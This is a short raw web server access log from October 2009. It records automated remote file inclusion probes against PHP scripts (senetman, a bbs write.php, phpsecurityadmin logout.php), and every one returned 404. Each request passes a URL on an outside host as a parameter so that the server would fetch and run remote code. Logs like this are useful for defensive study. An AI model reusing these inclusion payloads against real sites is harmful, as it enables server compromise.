77.222.131.59 - - [17/Oct/2009:04:58:19 -0400] "GET /logs/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:04:58:19 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.11.145.8 - - [17/Oct/2009:04:58:27 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:58:57 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
94.75.245.36 - - [17/Oct/2009:04:58:59 -0400] "GET /senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:04:58:59 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
